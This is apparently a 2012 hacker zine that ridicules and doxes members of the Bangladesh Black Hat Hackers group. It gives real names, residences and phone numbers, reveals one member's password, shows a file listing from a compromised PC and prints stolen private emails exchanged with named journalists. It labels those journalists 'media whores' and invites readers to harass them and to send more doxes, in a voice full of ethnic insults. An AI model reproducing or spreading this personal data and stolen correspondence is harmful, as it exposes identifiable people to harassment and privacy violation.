    * BD Shell (duplicate a/c of BD Xtor, Plan B against pwnage)
    * Angel Irine (Optimus BlackBurn in cross dressing mode)
    * Rotating Rotor
[[------ Table of Contents ------]]
  [*] Introduction
  [*] (un)Anonimization
  [*] Life Style of the pwned and lamest with: BD XTOR
  [*] Dox Dropping Contest
  [[ *** Random Quotes ***]]
  Optimus BlackBurn (5:33pm Mar 11):
    Taile Apne e Bolen, Apner Recover Option e Deoa Roice, 
    It's Eassy To Hack When he Get Your mail Address
    Apnei Bujhte Parsen Taile Kamne Paice er Pass
    Don't be too sure BBM "bro", may be you are pwned too.
   ****** BLACKBURN-PC__BLACK BURN *******
   Volume in drive C has no label.
   Volume Serial Number is B885-33A0
   Directory of C:\
  03/02/2012  01:25 PM             1,024 .rnd
  06/11/2009  03:42 AM                24 autoexec.bat
  05/12/2009  04:12 PM             2,832
  05/12/2009  04:12 PM             2,105
  05/12/2009  04:12 PM             1,117
  02/01/2012  09:36 AM             6,576 bootsqm.dat
  06/11/2009  03:42 AM                10 config.sys
  01/22/2012  08:53 PM             4,525 debug1214.txt
  11/28/1997  02:48 PM            12,039 doexec.c
  07/09/1996  04:01 PM             7,283 generic.h
  11/06/1996  10:40 PM            22,784 getopt.c
  11/03/1994  07:07 PM             4,765 getopt.h
  02/06/1998  03:50 PM            61,780 hobbit.txt
  11/28/1997  02:36 PM               544 makefile
  01/03/1998  02:37 PM            59,392 nc.exe
  01/04/1998  03:17 PM            69,081 NETCAT.C
  09/02/2010  07:20 AM               618 NetworkCfg.xml
  07/14/2009  08:37 AM    <DIR>          PerfLogs
  03/02/2012  03:30 AM    <DIR>          Program Files
  09/09/2010  10:30 AM             9,345
  03/02/2012  05:03 AM    <DIR>          Python25
  02/08/2012  03:59 AM    <DIR>          Python27
  02/08/2012  03:16 AM    <DIR>          Python32
  03/02/2012  04:55 AM    <DIR>          Setup
  01/21/2012  07:09 PM    <DIR>          Users
  02/29/2012  03:31 PM    <DIR>          Windows
                18 File(s)        265,844 bytes
                 8 Dir(s)   2,315,337,728 bytes free
   Volume in drive D is Black Burn
   Volume Serial Number is 00D3-2A3F
  Directory of D:\
  01/28/2012  11:30 PM            13,146 .xml
  03/01/2012  01:03 AM    <DIR>          Audio
  02/01/2012  09:39 AM             6,288 bootsqm.dat
  02/09/2012  01:09 PM            30,459 Chrome Book Mark.html
  03/02/2012  06:17 AM    <DIR>          Downloads
  02/25/2012  10:05 PM    <DIR>          India Secret
  02/25/2012  03:46 AM    <DIR>          India Secret 2
  02/28/2012  01:46 PM            11,482 Lans.xml
  03/01/2012  10:02 PM    <DIR>          Metasploit
  02/28/2012  01:27 PM    <DIR>          netscan
  02/28/2012  01:26 PM         1,984,929
  02/28/2012  09:21 PM    <DIR>          Pictures
  03/02/2012  05:01 AM    <DIR>          Program Files
  02/27/2012  01:37 AM    <DIR>          Software
  01/21/2012  07:08 PM    <DIR>          usr
  01/28/2012  04:02 AM    <DIR>          xampp
                 5 File(s)      2,046,304 bytes
                11 Dir(s)  13,645,021,184 bytes free
[[---------- Introduction ----------]]
  We are Bangladesh Black Hat Hackers.
  We are Anonymous.
  We are Legion.
  We don't forget.
  We don't forgive.
  p.s: We are idiots ! :PpppPPpp
  ^^ This is how it all started. A bunch of wannabe script kids with 
  L00k m4 m3 4 31337 h4x0r .. cyber war .. judhdho .. joy bangla.. lolzz
  The BBHH group consists of a bunch of idiots from Bangladesh some of whom are
  living abroad in France, Italy etc with a feeling of invincibility and
  political correctness, something which is quite common in an immature society
  such as Bangladesh. The group started with the common objective of ego
  satisfaction and hactivism against India, protesting against Indian Border
  Security Force doing its job of stopping illegal immigrants from Bangladesh to
  cross over to India, which for some reason has pissed off the Bangladeshis who
  seem to be considering illegal immigration to India as their birth right.
  Nevertheless, these BBHH kiddie operations brought decent media attention
  particularly in Bangladesh which was probably dieing for an oppurtunity for
  spreading anti-Indian propaganda. The amazing mumbling blind sheeps of Bangla
  Land followed their new found heroes on Facebook  and created an interesting
  social uprising with a common cause, no matter how twisted or disoriented or
  hypocritic it is.
  The amazing ability of the blind sheeps to "Like" a facebook post no matter
  how insulting it is for them is really amusing and lol'able. When BBHH's
  facebook fan page was pwned and their private info was being leaked, hordes
  and hordes of brainless followers "Liked" the post in no time. We really love
  you all for that.
[[---------- (un)Anonimization ---------]]
  Skype:  videomotions (contributed by Yousuf Ahmed, read below!)
[[-------- Media Whores -----------]]
  Some media personnels (so called journalists) contacted the BBHH Team and
  praised them for their anti-indian activity and encouraged them in their
  criminal conducts:
    [*] Adnan Firoze
      [*] <>
      [*] Dhaka Courier & United News of Bangladesh
    [*] Syed Tashfin Chowdhury
      [*] <>
      [*] New Age
    [*] Ahsan Kabir
      [*] <>
      [*] Output Editor
    [*] Zahirul Islam (haha!)
      [*] <>
      [*] Some Private University
    [*] Yousuf Ahmed
      [*] <>
      [*] THE ONE who shall protect BBHH from RAB (or so does he claim!)
      [*] Donates Skype account with credit to kiddies for kiddie activities
  Somebody please mail them and tell them what you really feel about them
  supporting cyber crime.
[[---- Life Style of the pwned and lamest with: BD XTOR ----]]
  Helloooo everybody and welcome to the `Life style of the pwned and THE 
  LAMEST`. Our special guest today is the ultra elite h4x0r who loves wearing a
  Black HAT .. who calls himself BDXtor (at least till his facebook and mail a/c
      got pwned).
  **claps** **claps** **claps**
  MMHH: Thank you BDXtor for honoring us with your presence..
  BDXtor: no probz bro.. always ready for some media whoring.. 
  BDXtor: .. btw. never been pwned!
  MMHH: So, tell us briefly about your background and how you got introduced to
  h4x0r1ng ?
  BDXtor: bro, I born and brought up in small village on Dhaka in
  Bangladesh and I a gifted kid I quickly learned all the Bengali
  slangs and by time I was 12, I was writing propaganda material for various
  local mullahs. I know at least 31337 unique slangs and my notep4d has at least 50
  different ways of saying "Fuck You".. 
  BDXtor: .. btw. never been pwned!
  BDXtor: fine day one I is introduced to a computer nd ev3r since I
  h4x0r3d. While other stupeed k1ds play video games, i hack i hack !!!!!!!
  MMHH: Please tell us about your favourite hacking tool.
  BDXtor: Havij ! Is there a world outisde havij ?
  MMHH: Who is Rupa and how is Esha ?
  BDXtor: WHAT !!??!! WTF !!??!! shaala kutta lath marum tore..
  MMHH: err... uhmm uh.. never mind. 
  MMHH: Please show us your h4x0r1ng example?
  BDXtor: Sure..
  BDXtor: Here I h4ck some stupid site.. 
  MMHH: Please tell us your commonly used password..
  BDXtor: huh? gadha naki? who asks question like this? 
  MMHH: Come on dude, its an open secret now. Almost everybody and their dogs
  will be knowing some of your passwords.. 
  BDXtor: hoise hoise.. its "rupaesha" with h4x0r verbs in head and tale..
  MMHH: Thank you BDXtor for spending time with us. We hope you enjoy your lamering
  day in and day out and keep wasting your time. Please don't commit suicide
  Some more pics for your readers:
[[--------------- Dox Dropping Contest ------------------------]]
  Dear readers, we really need your contribution here. Please send your
  contributions for the next release.
  Till then enjoy!
    ** BdXtor **
    AKA:                        BD Shell
    AKA:                        Master Mind
    Real Name:                  Unknown Idiot
    Nationality:                Bangladeshi
    Country of Residence:       Italy
    Last known IP:    
    Phone:                      +39-3275329256
    ** Optimus BlackBurn **
    AKA:                        Angel Irine
    Real Name:                  Jannatul Nayeem
    Nationality:                Bangladeshi
    Country of Residence:       Bangladesh
    Last known IP:    
    Phone:                      +880-1919834692
    Phone:                      +880-1681360804
    Phone:                      +880-1829649615
    ** Back Bone **
    Real Name:                  Mamun
    Nationality:                Bangladeshi
    Country of Residence:       Singapore
    Phone:                      +65-98949788
[[---------- EXTRA: Mailbox Glimpse -----------]]
Received: by with SMTP id w10csp1667pbr;
        Sun, 19 Feb 2012 04:21:17 -0800 (PST)
Return-Path: <>
Received-SPF: pass ( domain of
Authentication-Results:; spf=pass 
Received: from ([])
        by with SMTP id h1mr7005302bkw.85.1329654075320 (num_hops = 1);
        Sun, 19 Feb 2012 04:21:15 -0800 (PST)
DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed;; s=gamma;
MIME-Version: 1.0
Received: by with SMTP id h1mr7005302bkw.85.1329654075301; Sun,
 19 Feb 2012 04:21:15 -0800 (PST)
Received: by with HTTP; Sun, 19 Feb 2012 04:21:15 -0800 (PST)
Date: Sun, 19 Feb 2012 18:21:15 +0600
Message-ID: <>
Subject: From Dhaka Courier and United News Bangladesh
From: Adnan Firoze <>
Content-Type: multipart/alternative; boundary=0015175d079ad51fde04b9503654
Content-Type: text/plain; charset=ISO-8859-1
Dear Sir
Firstly accept our greetings and appreciation of your work.
*Now let me turn to the main subject. As you have seen that ATN News has
wrongfully portrayed a  hacker "Code Red" who had very little idea about
hacking. We request you to give us some of the responses for the following
queries becuase we are doing a cover story on "Black Hat Hackers" - from a
neutral yet POSITIVE standpoint. Just to let you know, are also against the
actions of India and people like Mustafa Jabbar. It would be great if you
answer the following (in Bangla or English whichever you like):*
1. How did this idea of attacking Indian sites come about?
2. How did you form a community/How did you meet?
3. What kind of age group are you guys from?
4. Do you have any response to give out to the media to protest the ATN
news report?
5. Do you want any other message of invitation or encouragement to the mass
6. What is the difference between defacing and DDOS attacks?
7. Which "hack" do you people tend to think to be your most successful one?
8. Why are you not afraid of legal actions or do you cover your tracks
9. We have heard numerous foreign hacking groups are supporting Bangladesh
in this war,. Why do you think they are supporting and which countries are
generally supporting you?
*We would be grateful if you would kindly reply to the questions above and the
story will be published next Friday (Feb 24). Your co-operation will be
highly appreciated and we will do our best to get your message across to
general people. *
Adnan Firoze
Staff Writer
Dhaka Courier & United News of Bangladesh
Content-Type: text/html; charset=ISO-8859-1
Content-Transfer-Encoding: quoted-printable
Dear Sir<br><br>Assalamualaikum.<br><br>Firstly accept our greetings and ap=
preciation of your work. <br><br><b>Now let me turn to the main subject. As=
 you have seen that ATN News has wrongfully portrayed a=A0 hacker &quot;Cod=
e Red&quot; who had very little idea about hacking. We request you to give =
us some of the responses for the following queries becuase we are doing a c=
over story on &quot;Black Hat Hackers&quot; - from a neutral yet POSITIVE s=
tandpoint. Just to let you know, are also against the actions of India and =
people like Mustafa Jabbar. It would be great if you answer the following <=
u>(in Bangla or English whichever you like)</u>:</b><br>
<br>1. How did this idea of attacking Indian sites come about?<br>2. How di=
d you form a community/How did you meet?<br>3. What kind of age group are y=
ou guys from?<br>4. Do you have any response to give out to the media to pr=
otest the ATN news report?<br>
5. Do you want any other message of invitation or encouragement to the mass=
 readers?<br>6. What is the difference between defacing and DDOS attacks?<b=
r>7. Which &quot;hack&quot; do you people tend to think to be your most suc=
cessful one?<br>
8. Why are you not afraid of legal actions or do you cover your tracks prop=
erly?<br>9. We have heard numerous foreign hacking groups are supporting Ba=
ngladesh in this war,. Why do you think they are supporting and which count=
ries are generally supporting you?<br>
<br><b>We would be grateful if you would kindly reply to the questions abov=
e and <u>the story will be published next Friday (Feb 24)</u>. Your co-oper=
ation will be highly appreciated and we will do our best to get your messag=
e across to general people. </b><br>
<br>Regards<br><br>Adnan Firoze<br>Staff Writer<br>Dhaka Courier &amp; Unit=
ed News of Bangladesh<br><a href=3D"">htt=
p://</a><br><a href=3D"http://www.dhakacourier.c="></a><br>
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Date: Wed, 7 Mar 2012 19:48:58 +0600
Message-ID: <>
Subject: Re: A few questions from a journalist
To: bangladeshblack hathacker <>
Content-Type: multipart/alternative; boundary=f46d0442726cd6cdff04baa76b6f
Content-Type: text/plain; charset=ISO-8859-1
Dear Bd Xtor,
Thanks for your email. I have included the information in a cover story of
New Age's Xtra magazine. The magazine will be on sale from March 9.
I may need more info from you later, as I may have to do another piece for
some international news organization.
Thanks a lot for the info.
On Wed, Mar 7, 2012 at 5:19 AM, bangladeshblack hathacker <> wrote:
> Dear sir Hope you doing well.sory for long lolng delay.cyberwar 2 declear
> from indian site and we all declear war aginst bbhh hacked more
> then 100 indian can find all website list in attach file.all
> bangladeshi hackers group fighting on this war.and totall count near about
> 30 thousend.sory for bad english.if you want more infor let me know.
> thanks
> bd xtor
> On Fri, Feb 24, 2012 at 6:33 AM, <> wrote:
>> Dear hackers,
>> I am an editor of the Daily New Age and want to do a piece on the hacking
>> that the three groups have done.
>> I had sent an email to you all earlier. But you guys just sent me back an
>> email.
>> I am sending some questions now. Can one of please answer these and send
>> them back.
>> 1.) What is the total number of Indian websites that you have hacked till
>> date?
>> 2.) Is the cyber war still going on?
>> 3.) Most newspapers and Indian media, especially, claim that you have
>> support and involvement of a number of international hacking groups. How
>> far is this true?
>> 4.) Are you guys in anyway connected to Anonymous?
>> 5.) Are Bangladesh government forces trying to crack down on you people
>> now?
>> Thanks a lot.
>> --------------------
>> Syed Tashfin Chowdhury
>> Editor, Xtra
>> New Age
Content-Type: text/html; charset=ISO-8859-1
Content-Transfer-Encoding: quoted-printable
Dear Bd Xtor,<div>Thanks for your email. I have included the information in=
 a cover story of New Age&#39;s Xtra magazine. The magazine will be on sale=
 from March 9.</div><div><br></div><div>I may need more info from you later=
, as I may have to do another piece for some international news organizatio=
<div><br></div><div>Thanks a lot for the info.</div><div><br></div><div>Tas=
hfin</div><div><br><div class=3D"gmail_quote">On Wed, Mar 7, 2012 at 5:19 A=
M, bangladeshblack hathacker <span dir=3D"ltr">&lt;<a href=3D"mailto:bangla="></a>&gt;</s=
pan> wrote:<br>
<blockquote class=3D"gmail_quote" style=3D"margin:0 0 0 .8ex;border-left:1p=
x #ccc solid;padding-left:1ex">Dear sir Hope you doing well.sory for long l=
olng delay.cyberwar 2 declear from indian site and we all declear war agins=
t bbhh hacked more then 100 indian can find all website=
 list in attach file.all bangladeshi hackers group fighting on this war.and=
 totall count near about 30 thousend.sory for bad english.if you want more =
infor let me know.<br>
<br>thanks<br>bd xtor <br><div class=3D"HOEnZb"><div class=3D"h5"><br><div =
class=3D"gmail_quote">On Fri, Feb 24, 2012 at 6:33 AM,  <span dir=3D"ltr">&=
lt;<a href=3D"" target=3D"_blank">tashfinster@g=</a>&gt;</span> wrote:<br>
<blockquote class=3D"gmail_quote" style=3D"margin:0 0 0 .8ex;border-left:1p=
x #ccc solid;padding-left:1ex">
<div class=3D"gmail_quote">Dear hackers,<div><br></div><div>I am an editor =
of the Daily New Age and want to do a piece on the hacking that the three g=
roups have done.</div><div><br></div><div>I had sent an email to you all ea=
rlier. But you guys just sent me back an email.</div>
<div><br></div><div>I am sending some questions now. Can one of please answ=
er these and send them back.</div><div><br></div><div>1.) What is the total=
 number of Indian websites that you have hacked till date?</div><div><br>
</div><div>2.) Is the cyber war still going on?</div><div><br></div><div>3.=
) Most newspapers and Indian media, especially, claim that you have support=
 and involvement of a number of international hacking groups. How far is th=
is true?</div>
<div><br></div><div>4.) Are you guys in anyway connected to Anonymous?</div=
><div><br></div><div>5.) Are Bangladesh government forces trying to crack d=
own on you people now?</div><div><br></div><div>Thanks a lot.</div><div>
<br></div><div><br></div><div>--------------------</div><div>Syed Tashfin C=
howdhury</div><div>Editor, Xtra</div><div>New Age</div>
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Received: by with HTTP; Fri, 17 Feb 2012 12:46:33 -0800 (PST)
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Date: Sat, 18 Feb 2012 02:46:33 +0600
Message-ID: <>
Subject: Re: about a secret interview
From: bangladeshblack hathacker <>
To: Wasik Ovee <>
Content-Type: multipart/alternative; boundary=047d7b10cac13a5baf04b92f0a39
Content-Type: text/plain; charset=ISO-8859-1
Bro, It's not possible to give any voice interview. You can send us
question. We will answer....
On Fri, Feb 17, 2012 at 9:13 PM, Wasik Ovee <> wrote:
> hello,
> *i found this mail ID from Jobayer Alam Rony*. he told me contact with
> you.
> i am talking from e Raising Star, Bangladeshi News paper. we wanted to
> take an interview about current hacking and other affair. we are ensuring
> that we will keep your identity secret and this interview will be positive
> for your team and for bangladesh.
> let me know if you like to take an interview with us. u can talk from
> gtalk or skype if u want. or u can come to our offie (raising star)... as u
> think best.
> reply as soon as possible
> --
> *Wasik Ovee*
> *CEO*
> *Design Phenomena* <>
Content-Type: text/html; charset=ISO-8859-1
Content-Transfer-Encoding: quoted-printable
Bro, It&#39;s not possible to give any voice interview. You can send us que=
stion. We will answer.... <br><br><div class=3D"gmail_quote">On Fri, Feb 17=
, 2012 at 9:13 PM, Wasik Ovee <span dir=3D"ltr">&lt;<a href=3D"mailto:wasik="></a>&gt;</span> wrote:<br>
<blockquote class=3D"gmail_quote" style=3D"margin:0 0 0 .8ex;border-left:1p=
x #ccc solid;padding-left:1ex">hello,<br><b>i found this mail ID from Jobay=
er Alam Rony</b>. he told me contact with you.<br><br>i am talking from e R=
aising Star, Bangladeshi News paper. we wanted to take an interview about c=
urrent hacking and other affair. we are ensuring that we will keep your ide=
ntity secret and this interview will be positive for your team and for bang=
<br>let me know if you like to take an interview with us. u can talk from g=
talk or skype if u want. or u can come to our offie (raising star)... as u =
think best.<br><br>reply as soon as possible<span class=3D"HOEnZb"><font co=
lor=3D"#888888"><br clear=3D"all">
<br>-- <br>
<font style=3D"font-family:courier new,monospace" size=3D"2"><b>Wasik Ovee<=
/b></font><br><i style=3D"font-family:courier new,monospace">CEO</i><br><a =
href=3D"" target=3D"_blank"><font st=
yle=3D"font-family:courier new,monospace" size=3D"2"><b><span style=3D"colo=
r:rgb(153,0,0)">Design</span> <span style=3D"color:rgb(255,102,0)">Phenomen=
MIME-Version: 1.0
Received: by with HTTP; Sun, 12 Feb 2012 10:47:04 -0800 (PST)
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Date: Mon, 13 Feb 2012 00:47:04 +0600
Message-ID: <>
Subject: Re: Ur articke
From: bangladeshblack hathacker <>
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